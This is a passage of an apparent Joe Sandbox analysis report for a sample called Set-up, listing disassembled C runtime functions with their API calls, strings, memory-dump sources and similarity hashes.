Function 6BB4C737 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT(?,?,00000000,?,00000180,00000000,?,?), ref: 6BB4C801

Strings

UTF-8, xrefs: 6BB52CD5
ccs, xrefs: 6BB52CA0
UTF-16LE, xrefs: 6BB52CED
UNICODE, xrefs: 6BB52D05

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: __wsopen_s
String ID: UNICODE$UTF-16LE$UTF-8$ccs
API String ID: 3347428461-3573488595
Opcode ID: 0ed4c2798b2b5007df8baf48025a3a3d463b266ce9ec5d187816c89f53ca4bb9
Instruction ID: 8b868f93ea4e6bdfecf59cb6001b20b1c22d0bd62df33f13a35dfa4427073f25
Opcode Fuzzy Hash: 0ed4c2798b2b5007df8baf48025a3a3d463b266ce9ec5d187816c89f53ca4bb9
Instruction Fuzzy Hash: 827126B3D843C9DFE7108F68D94576E7BB0FB02B44F1040A6DC549328AE3BD8A85E652

Function 6BB7B87B Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 115libraryloaderCOMMON

Download Yara Rule

APIs

?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB7B88C

Part of subcall function 6BB7B6C7: __EH_prolog3.LIBCMT ref: 6BB7B6CE

?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB7B89A
?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB7B8A8
?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB7B8B2
?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR100 ref: 6BB7B8BC
Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB7B8D1
_CxxThrowException.MSVCR100(?,6BBDFEB4,00000000), ref: 6BB7B8E0
GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumber), ref: 6BB7B8EF
GetProcAddress.KERNEL32(00000000), ref: 6BB7B8F6
GetLastError.KERNEL32 ref: 6BB7B900
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB7B919

Strings

GetCurrentProcessorNumber, xrefs: 6BB7B8E5
kernel32.dll, xrefs: 6BB7B8EA

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Version@$Concurrency@@Manager@1@Resource$AddressConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency::unsupported_os::unsupported_osErrorExceptionH_prolog3HandleLastModuleProcThrow
String ID: GetCurrentProcessorNumber$kernel32.dll
API String ID: 204447691-1711015486
Opcode ID: 6e223cd4898fcdafddc53de33462a4925ed91e3d272a917fbe369af215e71bcb
Instruction ID: af75e6359c63eec9f193e617177e307b39d93603928fdc5e4ef3809c9840a89e
Opcode Fuzzy Hash: 6e223cd4898fcdafddc53de33462a4925ed91e3d272a917fbe369af215e71bcb
Instruction Fuzzy Hash: A7418C714082829BD730EF25C8A172EB3E4FF85315F1489BAE4B596182C73CD599DFA2

Function 6BB47F86 Relevance: 21.3, APIs: 14, Instructions: 349COMMON

Download Yara Rule

APIs

_calloc_crt.MSVCR100(00000001,00000050), ref: 6BB47FAC
_malloc_crt.MSVCR100(00000004), ref: 6BB47FBF

Part of subcall function 6BB40CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB4AB90,00000018,6BB4AA18,0000000C,6BB674F7,00000001,00000001,?,6BB421A9,0000000D), ref: 6BB40CE5

_malloc_crt.MSVCR100(00000004), ref: 6BB47FDD

Part of subcall function 6BB4767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB476C4
Part of subcall function 6BB4767A: _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6BB476D3
Part of subcall function 6BB4767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB476EC

free.MSVCR100(00000000), ref: 6BB7170F
free.MSVCR100(00000000), ref: 6BB71718
free.MSVCR100(?,00000000), ref: 6BB71720
___free_lconv_mon.LIBCMT ref: 6BB71729
free.MSVCR100(00000000,00000000), ref: 6BB7172F
free.MSVCR100(?,00000000,00000000), ref: 6BB71737
free.MSVCR100(?,?,00000000,00000000), ref: 6BB7173F
free.MSVCR100(?), ref: 6BB7174F
free.MSVCR100(?,?), ref: 6BB7175A

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: free$InfoLocale_calloc_crt_malloc_crt$___free_lconv_monmalloc
String ID:
API String ID: 1432309319-0
Opcode ID: 376544ca8f408af60ef155a7beed9f7fd3e6a0e83f2a080900b28be75b3efa38
Instruction ID: 594f1a3711d63a37a2ab07a6ac6c5aa7354c0c2fcb7f43d4b4f242490fe14293
Opcode Fuzzy Hash: 376544ca8f408af60ef155a7beed9f7fd3e6a0e83f2a080900b28be75b3efa38
Instruction Fuzzy Hash: 72B171B2940258AAEB20CFA5CC81FEB77AEFB49740F140466FA05EB189E6B4D540D760

Function 6BB4203F Relevance: 21.1, APIs: 14, Instructions: 108threadCOMMON

Download Yara Rule

APIs

__set_flsgetvalue.MSVCR100(6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4206A

Part of subcall function 6BB4067B: TlsGetValue.KERNEL32(?,6BB406AF), ref: 6BB40684

TlsGetValue.KERNEL32(6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4207B
_calloc_crt.MSVCR100(00000001,00000214), ref: 6BB4208E
DecodePointer.KERNEL32(00000000), ref: 6BB420AC
_initptd.MSVCR100(00000000,00000000), ref: 6BB420BE

Part of subcall function 6BB4215F: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BB42200,00000008,6BB675E9,00000000,00000000), ref: 6BB42170
Part of subcall function 6BB4215F: _lock.MSVCR100(0000000D), ref: 6BB421A4
Part of subcall function 6BB4215F: InterlockedIncrement.KERNEL32(?), ref: 6BB421B1
Part of subcall function 6BB4215F: _lock.MSVCR100(0000000C), ref: 6BB421C5

GetCurrentThreadId.KERNEL32 ref: 6BB420C5
__freeptd.LIBCMT ref: 6BB425B1
__heap_init.LIBCMT ref: 6BB4B235
GetCommandLineA.KERNEL32(6BB420E0,00000008,6BB42116,00000001,?), ref: 6BB4B266
GetCommandLineW.KERNEL32 ref: 6BB4B271
__ioterm.LIBCMT ref: 6BB580B2
free.MSVCR100(00000000), ref: 6BB67485

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
String ID:
API String ID: 2121586863-0
Opcode ID: d90ff4819dfa5fdb80237684d1b9a208ff3292324f88c1c18c298171c6dbf21c
Instruction ID: abd3880322d6591927c2b599f184eeb4128c803dfea4d120e84704bed747d6e0
Opcode Fuzzy Hash: d90ff4819dfa5fdb80237684d1b9a208ff3292324f88c1c18c298171c6dbf21c
Instruction Fuzzy Hash: 4B31FE324652C1EEDB213FB58D1662E3BA4FF42799B240456D810C2168EF7EC482BA33

Function 6BB8012C Relevance: 19.7, APIs: 13, Instructions: 164COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000008,45C8E9F0,?,?), ref: 6BB80169

Part of subcall function 6BB402C1: malloc.MSVCR100(?), ref: 6BB402CC

?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR100(45C8E9F0,?,?), ref: 6BB801A4
??_U@YAPAXI@Z.MSVCR100(00000000,45C8E9F0,?,?), ref: 6BB801BD
??_U@YAPAXI@Z.MSVCR100(00000000,45C8E9F0,?,?), ref: 6BB801D8
_memset.LIBCMT(?,00000000,?,45C8E9F0,?,?), ref: 6BB801EC
_memset.LIBCMT(?,00000000,?,45C8E9F0,?,?), ref: 6BB801FF
CreateSemaphoreW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,?,?,45C8E9F0,?,?), ref: 6BB8024F
GetLastError.KERNEL32(?,?,?,45C8E9F0,?,?), ref: 6BB8025F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,45C8E9F0,?,?), ref: 6BB80278
_CxxThrowException.MSVCR100(?,6BBDFEB4,00000000,?,?,?,45C8E9F0,?,?), ref: 6BB80287
??2@YAPAXI@Z.MSVCR100(0000000C,?,?,?,45C8E9F0,?,?), ref: 6BB8028E
??2@YAPAXI@Z.MSVCR100(00004004,?,?,?,45C8E9F0,?,?), ref: 6BB802B0
_memset.LIBCMT(00000000,00000000,00004004,?,?,?,45C8E9F0,?,?), ref: 6BB802C1

Part of subcall function 6BB816DE: _memset.LIBCMT(?,00000000,0000003E,00000000,00000000), ref: 6BB816FD

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _memset$??2@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency@@Count@CreateErrorExceptionLastNodeProcessorSemaphoreThrowmalloc
String ID:
API String ID: 1488694034-0
Opcode ID: 7a05cd6f13cd83a7c283a37ad7800ff42764c9fa8981cde0ea4adba0c62d618f
Instruction ID: 9c3558e14b4b5e16c5a7a6caafb6e9d2f61597be6dbc27029054274b91e02835
Opcode Fuzzy Hash: 7a05cd6f13cd83a7c283a37ad7800ff42764c9fa8981cde0ea4adba0c62d618f
Instruction Fuzzy Hash: B551C6B1505B819FD725DF34C882B2ABBE4FF48364F104A3DE15ACB690DB79E8418B54

Function 6BB54F02 Relevance: 19.6, APIs: 13, Instructions: 147stringCOMMON

Download Yara Rule

APIs

_strnlen.LIBCMT(?,?), ref: 6BB54F26
__crtLCMapStringA.MSVCR100(?,?,00000100,?,000000FF,00000000,00000000,?,00000001), ref: 6BB54F5A
__crtLCMapStringA.MSVCR100(?,?,00000100,?,000000FF,00000000,00000000,?,00000001), ref: 6BB54FD5
strcpy_s.MSVCR100(?,?,00000000), ref: 6BB54FEC
_freea_s.MSVCR100(00000000), ref: 6BB54FF9
_errno.MSVCR100 ref: 6BB6C372
_invalid_parameter_noinfo.MSVCR100 ref: 6BB6C37C
_errno.MSVCR100 ref: 6BB6C3AD
_errno.MSVCR100 ref: 6BB6C3B8
_errno.MSVCR100 ref: 6BB6C3C7
malloc.MSVCR100(00000008), ref: 6BB6C3D1
_errno.MSVCR100 ref: 6BB6C3EA
_errno.MSVCR100 ref: 6BB6C3F7

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$String__crt$_freea_s_invalid_parameter_noinfo_strnlenmallocstrcpy_s
String ID:
API String ID: 2430913482-0
Opcode ID: 9dca51d8b0d79153b1d330fcb5ca496e93bda45b8bcb1c03b1cfb8251fd57e9b
Instruction ID: d81d7b4d004d9eee1d620cbc65516baf95e63abc08bb7219f7313c17c6ff12a3
Opcode Fuzzy Hash: 9dca51d8b0d79153b1d330fcb5ca496e93bda45b8bcb1c03b1cfb8251fd57e9b
Instruction Fuzzy Hash: CD410132A082C1EFEF054F78CC45B9E7BB1EF46754F100099E5189B294EB7D88519B62

Function 6BB43BF7 Relevance: 19.6, APIs: 13, Instructions: 145COMMON

Download Yara Rule

APIs

wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6BB43C95,?,?,?), ref: 6BB43C1B
_errno.MSVCR100(?,?,?,?,?,?,6BB43C95,?,?,?), ref: 6BB6C5A3
_invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6BB43C95,?,?,?), ref: 6BB6C5AD
___crtLCMapStringW.LIBCMT(?,00000100,?,000000FF,00000000,00000000,?,?,?,?,?,?,6BB43C95,?,?,?), ref: 6BB6C5CA
_errno.MSVCR100(?,?,6BB43C95,?,?,?), ref: 6BB6C5DB
_errno.MSVCR100(?,?,6BB43C95,?,?,?), ref: 6BB6C5E6
_errno.MSVCR100(?,?,6BB43C95,?,?,?), ref: 6BB6C5FC
malloc.MSVCR100(00000008,?,?,6BB43C95,?,?,?), ref: 6BB6C634
_errno.MSVCR100(?,?,6BB43C95,?,?,?), ref: 6BB6C650
___crtLCMapStringW.LIBCMT(?,00000100,?,000000FF,00000000,00000000,?,?,6BB43C95,?,?,?), ref: 6BB6C66B
wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6BB43C95,?,?,?), ref: 6BB6C67C
_freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6BB43C95,?,?,?), ref: 6BB6C695

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$String___crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
String ID:
API String ID: 4082481270-0
Opcode ID: f600c535099d20e312bfee28a6e4c596367ffa71f312b0015547c1c7246afd7d
Instruction ID: 0bb8ebc746b2cd99a4988b3376290cded9d70df5da104e80a4d6cb0e9367f078
Opcode Fuzzy Hash: f600c535099d20e312bfee28a6e4c596367ffa71f312b0015547c1c7246afd7d
Instruction Fuzzy Hash: A54108716042D5AFDF145F78CC82E6E37A4EF16798B1040AAE518CB294FB7CCD409BA6

Function 6BB449C8 Relevance: 19.6, APIs: 13, Instructions: 140stringCOMMON

Download Yara Rule

APIs

_malloc_crt.MSVCR100(00000355,00000000,6BB44E81,00000001,00000000,00000000), ref: 6BB449DC

Part of subcall function 6BB40CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB4AB90,00000018,6BB4AA18,0000000C,6BB674F7,00000001,00000001,?,6BB421A9,0000000D), ref: 6BB40CE5

Part of subcall function 6BB4498E: strcat_s.MSVCR100(6BB45C30,6BB45C0F,6BB45C20,?,00000083,00000083,?,6BB45C24,6BB45C0F,6BB45C30,00000002,6BB45C30,6BB45C0F,?,00000000,00000000), ref: 6BB449AD

strcat_s.MSVCR100(00000004,00000351,6BB4498C,?,?,?,?,?,00000000,6BB44E81,00000001,00000000), ref: 6BB44A29
strcmp.MSVCR100(00000000,00000010,?,?,?,?,?,?,?,?,00000000,6BB44E81,00000001,00000000), ref: 6BB44A46
free.MSVCR100(6BB44E81,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB44A8D
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6BB44E81,00000001), ref: 6BB70BD9
free.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6BB44E81), ref: 6BB70BE1

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: freestrcat_s$__invoke_watson_malloc_crtmallocstrcmp
String ID:
API String ID: 1358975119-0
Opcode ID: f4cdb992d4de4460a77e988c6e013982d1a63bd911e309a255aaa39f5791e9db
Instruction ID: 993104344cdefd14f9107070d07548a0a293591714ed9cba0c11dbc0b528b3c0
Opcode Fuzzy Hash: f4cdb992d4de4460a77e988c6e013982d1a63bd911e309a255aaa39f5791e9db
Instruction Fuzzy Hash: 2F417A71904785AFDB209F6ACD81A1EBBF8FF01708F10086DE141A7665EB79E964EB00

Function 6BB529FE Relevance: 19.6, APIs: 13, Instructions: 93COMMON

Download Yara Rule

APIs

GetFullPathNameA.KERNEL32(?,?,00000000,?), ref: 6BB52A42
GetFullPathNameA.KERNEL32(?,00000000,00000000,00000000), ref: 6BB67A58
GetLastError.KERNEL32 ref: 6BB67A5E
__dosmaperr.LIBCMT(00000000), ref: 6BB67A65
_errno.MSVCR100 ref: 6BB67A7F
calloc.MSVCR100(?,00000001), ref: 6BB67A94
_errno.MSVCR100 ref: 6BB67AA5
_errno.MSVCR100 ref: 6BB67AB2
_invalid_parameter_noinfo.MSVCR100 ref: 6BB67ABD
free.MSVCR100(00000000), ref: 6BB67ACB
_errno.MSVCR100 ref: 6BB67AD1
free.MSVCR100(00000000), ref: 6BB67AE8
_getcwd.MSVCR100(?,?), ref: 6BB67AF9

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$FullNamePathfree$ErrorLast__dosmaperr_getcwd_invalid_parameter_noinfocalloc
String ID:
API String ID: 4002649621-0
Opcode ID: 40294079a9dd3c9be58c1eb2013ef8127369e3a23a66f6762768cf532151f0e5
Instruction ID: acfce0ab8b719ec159a74dd98bc1126fb7c717897cf9355b6b5e334c69f3f1b7
Opcode Fuzzy Hash: 40294079a9dd3c9be58c1eb2013ef8127369e3a23a66f6762768cf532151f0e5
Instruction Fuzzy Hash: 1D21A1725082C9AEEB105EB5CCC1A5E37AAEB417E8B104465F914CB180FBBD8E41DEA1

Function 6BB41E61 Relevance: 19.6, APIs: 13, Instructions: 93COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6BB41EA6
GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 6BB67B41
GetLastError.KERNEL32 ref: 6BB67B47
__dosmaperr.LIBCMT(00000000), ref: 6BB67B4E
_errno.MSVCR100 ref: 6BB67B6B
calloc.MSVCR100(?,00000002), ref: 6BB67B80
_errno.MSVCR100 ref: 6BB67B91
_errno.MSVCR100 ref: 6BB67B9E
_invalid_parameter_noinfo.MSVCR100 ref: 6BB67BA9
free.MSVCR100(00000000), ref: 6BB67BB7
_errno.MSVCR100 ref: 6BB67BBD
free.MSVCR100(00000000), ref: 6BB67BD4
_wgetcwd.MSVCR100(?,?), ref: 6BB67BE5

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno$FullNamePathfree$ErrorLast__dosmaperr_invalid_parameter_noinfo_wgetcwdcalloc
String ID:
API String ID: 3145916893-0
Opcode ID: 1668906f010f53cbc1666eb90787a26a080b6de484746871ae6878afce5a48dc
Instruction ID: df904ad03673548f753c9067d090974074e6b5630280f0961d58c3c9ba6f118d
Opcode Fuzzy Hash: 1668906f010f53cbc1666eb90787a26a080b6de484746871ae6878afce5a48dc
Instruction Fuzzy Hash: 7821A1725082C9AFEB016FB5DCA1D5E37A9FB417E8F284465E9108B184FBBC8C409B61

Function 6BB4F805 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB4F89E
DName::DName.LIBCMT ref: 6BB4F96F
DName::DName.LIBCMT ref: 6BB6D13B

Strings

`non-type-template-parameter, xrefs: 6BB6D126

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: NameName::
String ID: `non-type-template-parameter
API String ID: 1333004437-4247534891
Opcode ID: 8762c92d34ba96589e78161df895e45f85ea7dcdf40d8106370f9c09a7881021
Instruction ID: c68e1edbba6e904d699f1a6016f7edf74220c5642e2b1d91e928547d56e9fced
Opcode Fuzzy Hash: 8762c92d34ba96589e78161df895e45f85ea7dcdf40d8106370f9c09a7881021
Instruction Fuzzy Hash: DE41F3719442C4EFDB00DF68D891AAE3BB5FB42788F1440B9E5488F265EB79D847DB80

Function 6BB57949 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 109COMMON

Download Yara Rule

APIs

__TypeMatch.MSVCR100(00000003,?,00000000), ref: 6BB579C7
_getptd.MSVCR100 ref: 6BB579D7
_getptd.MSVCR100 ref: 6BB6CAFB
_getptd.MSVCR100 ref: 6BB6CB0D
_getptd.MSVCR100 ref: 6BB6CB69
_getptd.MSVCR100 ref: 6BB6CB7B

Strings

MOC, xrefs: 6BB6CAC7
csm, xrefs: 6BB6CB3E
RCC, xrefs: 6BB6CACE
csm, xrefs: 6BB57979

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _getptd$MatchType
String ID: MOC$RCC$csm$csm
API String ID: 965401092-1441736206
Opcode ID: 6b576735584244a2e40a0ad04f2e8cbcfa8abaa534f1e88dcbd532e97dde6d74
Instruction ID: f349520ae4cd2daa9abaf6cff16806ac9021b6a6784669ace619fd0534ce0e3d
Opcode Fuzzy Hash: 6b576735584244a2e40a0ad04f2e8cbcfa8abaa534f1e88dcbd532e97dde6d74
Instruction Fuzzy Hash: 0731B0726042C89FDF208F66C480B6D73B8FF41344F5885AAD899C7161E77CD995CBA2

Function 6BB4F608 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 83COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB6D596
operator+.LIBCMT ref: 6BB6D600

Strings

cli::array<, xrefs: 6BB6D5CA
cli::pin_ptr<, xrefs: 6BB6D5F1
void , xrefs: 6BB6D59E
void, xrefs: 6BB6D591

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: NameName::operator+
String ID: cli::array<$cli::pin_ptr<$void$void
API String ID: 1360548761-456688812
Opcode ID: ef9620161597a517a1800444add79fb118ff5728ed55a8165c25d0a75765cb61
Instruction ID: e75731ba1569b4cea594f4857f4cb1fbf99f19273be4261f0db6b4a265a78fa2
Opcode Fuzzy Hash: ef9620161597a517a1800444add79fb118ff5728ed55a8165c25d0a75765cb61
Instruction Fuzzy Hash: C121D171944288EFDF00DF64E841DAE3BB8FF05358F1040AAE9189B260EB39EE40CB50

Function 6BB4826F Relevance: 16.7, APIs: 11, Instructions: 193COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 6BB47493
free.MSVCR100(?), ref: 6BB4749F
free.MSVCR100(?,?), ref: 6BB474AA
_calloc_crt.MSVCR100(00000001,00000050), ref: 6BB48292
_malloc_crt.MSVCR100(00000004), ref: 6BB482B2

Part of subcall function 6BB40CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB4AB90,00000018,6BB4AA18,0000000C,6BB674F7,00000001,00000001,?,6BB421A9,0000000D), ref: 6BB40CE5

_malloc_crt.MSVCR100(00000004), ref: 6BB482D5
free.MSVCR100(00000000), ref: 6BB71699
